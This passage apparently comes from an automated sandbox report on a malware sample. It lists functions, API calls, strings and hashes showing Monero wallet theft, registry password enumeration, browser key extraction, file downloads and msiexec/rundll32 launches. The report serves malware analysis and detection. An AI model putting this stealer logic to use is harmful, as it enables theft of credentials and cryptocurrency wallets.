                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                          • Instruction ID: 13f6a21c044cfa3b440a498bbae8310b8a7aefe1cddacb8c5fc895cdcfa2cd26
                          • Opcode Fuzzy Hash: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                          • Instruction Fuzzy Hash: 7171B9B5910608ABDB04EBE4DD89FEEBBBDBF58700F108508F516A7290DB74A905CF61
                          Function 00132E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001331C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0013335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001334EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                          • Instruction ID: 3f35fb74d10c0c8d3918694629b5059df213c85233108eff23360af54a110ac9
                          • Opcode Fuzzy Hash: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                          • Instruction Fuzzy Hash: 9C121371850108AADB19FBA0DC92FEDB778AF24301F904199F54776191EF742B4ACFA2
                          Function 001352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                            • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                            • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                            • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                            • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                            • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                          • lstrlen.KERNEL32(00000000), ref: 0013532F
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                          • lstrlen.KERNEL32(00000000), ref: 00135383
                          • lstrlen.KERNEL32(00000000), ref: 001353AE
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: c73f54886aeb21507da27b05ae28b93ae15c8ca7fad9ce740f98612b37dd443d
                          • Instruction ID: 269f331e68198cfd47fa5cd9f26abaafa550362bc64fd7b029aaff13317c7979
                          • Opcode Fuzzy Hash: c73f54886aeb21507da27b05ae28b93ae15c8ca7fad9ce740f98612b37dd443d
                          • Instruction Fuzzy Hash: 01510F70910148EBDB18FF60DD96AED7779AF20301F904068F446AB592EF346B46DBA2
                          Function 001312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4d982bf4d3b308f922b666d25c549c282ca63baea3fb13b8f6bf36a9f7b36e8b
                          • Instruction ID: 7de2fd2e86c5d17bbc2f8f4dbab254f9cf51b0f69487442e0dad483e0d346daf
                          • Opcode Fuzzy Hash: 4d982bf4d3b308f922b666d25c549c282ca63baea3fb13b8f6bf36a9f7b36e8b
                          • Instruction Fuzzy Hash: A1C195B594021DABCB14EF60DC99FEA7378BF64304F1045D8F50AA7241EB70AA85DF91
                          Function 00134280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 001342EC
                          • lstrcat.KERNEL32(?,00F0F2F0), ref: 0013430B
                          • lstrcat.KERNEL32(?,?), ref: 0013431F
                          • lstrcat.KERNEL32(?,00F0D718), ref: 00134333
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                            • Part of subcall function 00129CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 001393C0: GlobalAlloc.KERNEL32(00000000,001343DD,001343DD), ref: 001393D3
                          • StrStrA.SHLWAPI(?,00F0F368), ref: 001343F3
                          • GlobalFree.KERNEL32(?), ref: 00134512
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                            • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                            • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 001344A3
                          • StrCmpCA.SHLWAPI(?,001408D1), ref: 001344C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001344D2
                          • lstrcat.KERNEL32(00000000,?), ref: 001344E5
                          • lstrcat.KERNEL32(00000000,00140FB8), ref: 001344F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 0705ed96aaf2e7a7a5aef9b01260f02c1631f335159510ca71dcb60d4135548e
                          • Instruction ID: 3db1b40002ce6740ad64a7b31d89f2f8d87f8554f3ecac20235d704327b5c5f5
                          • Opcode Fuzzy Hash: 0705ed96aaf2e7a7a5aef9b01260f02c1631f335159510ca71dcb60d4135548e
                          • Instruction Fuzzy Hash: 5F7156B6900218ABCB14EBA4DC89FEE777DAF98300F008598F605A7181DB75EB55CF91
                          Function 00121310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                            • Part of subcall function 001212A0: RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                            • Part of subcall function 001212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                            • Part of subcall function 001212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                            • Part of subcall function 001212A0: RegCloseKey.ADVAPI32(?), ref: 001212FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0012134F
                          • lstrlen.KERNEL32(?), ref: 0012135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00121377
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00121465
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 001214EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: a9723956ccd5454fff05a43a4ccb5788eb6ff63e69d2f4ab0c04c9274ec054cc
                          • Instruction ID: 021ee87028c974cf3919baefd374edcf7e64eecd5a1c1b98695495c42dee8947
                          • Opcode Fuzzy Hash: a9723956ccd5454fff05a43a4ccb5788eb6ff63e69d2f4ab0c04c9274ec054cc
                          • Instruction Fuzzy Hash: 5F5120B195011967CB15EB60DD92BED737CAF64300F8045D8B64AB2092EF706B89CFA6
                          Function 001275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001272D0: memset.MSVCRT ref: 00127314
                            • Part of subcall function 001272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                            • Part of subcall function 001272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                            • Part of subcall function 001272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                            • Part of subcall function 001272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                            • Part of subcall function 001272D0: HeapFree.KERNEL32(00000000), ref: 00127459
                          • lstrcat.KERNEL32(00000000,001417FC), ref: 00127606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00127648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0012765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0012768F
                          • lstrcat.KERNEL32(00000000,00141804), ref: 001276A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001276D3
                          • lstrcat.KERNEL32(00000000,00141808), ref: 001276ED
                          • task.LIBCPMTD ref: 001276FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                          • Instruction ID: a37ef172245dbef9fe750a4b61c4a84c41669a019dbe8005da40fcbf85f3c68a
                          • Opcode Fuzzy Hash: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                          • Instruction Fuzzy Hash: 01314D71901519EFCB05EBA4EC99DEF7778AB54302F148118F102B72A0DB74A956CF52
                          Function 001272D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00127314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                          • HeapFree.KERNEL32(00000000), ref: 00127459
                          • task.LIBCPMTD ref: 00127555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                          • Instruction ID: cf17f8339235d4f38bebfec99031351b383ec0a2e0e9769a64a87869de94d34b
                          • Opcode Fuzzy Hash: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                          • Instruction Fuzzy Hash: 76612BB5D042689BDB24DB50DC51FDAB7B8BF58300F0081E9E689A6181DBB05BD9CFA1
                          Function 001260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                          • InternetOpenA.WININET(00140DF7,00000001,00000000,00000000,00000000), ref: 0012610F
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0012618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001261B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001261DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00126249
                          • InternetCloseHandle.WININET(?), ref: 00126253
                          • InternetCloseHandle.WININET(00000000), ref: 00126260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
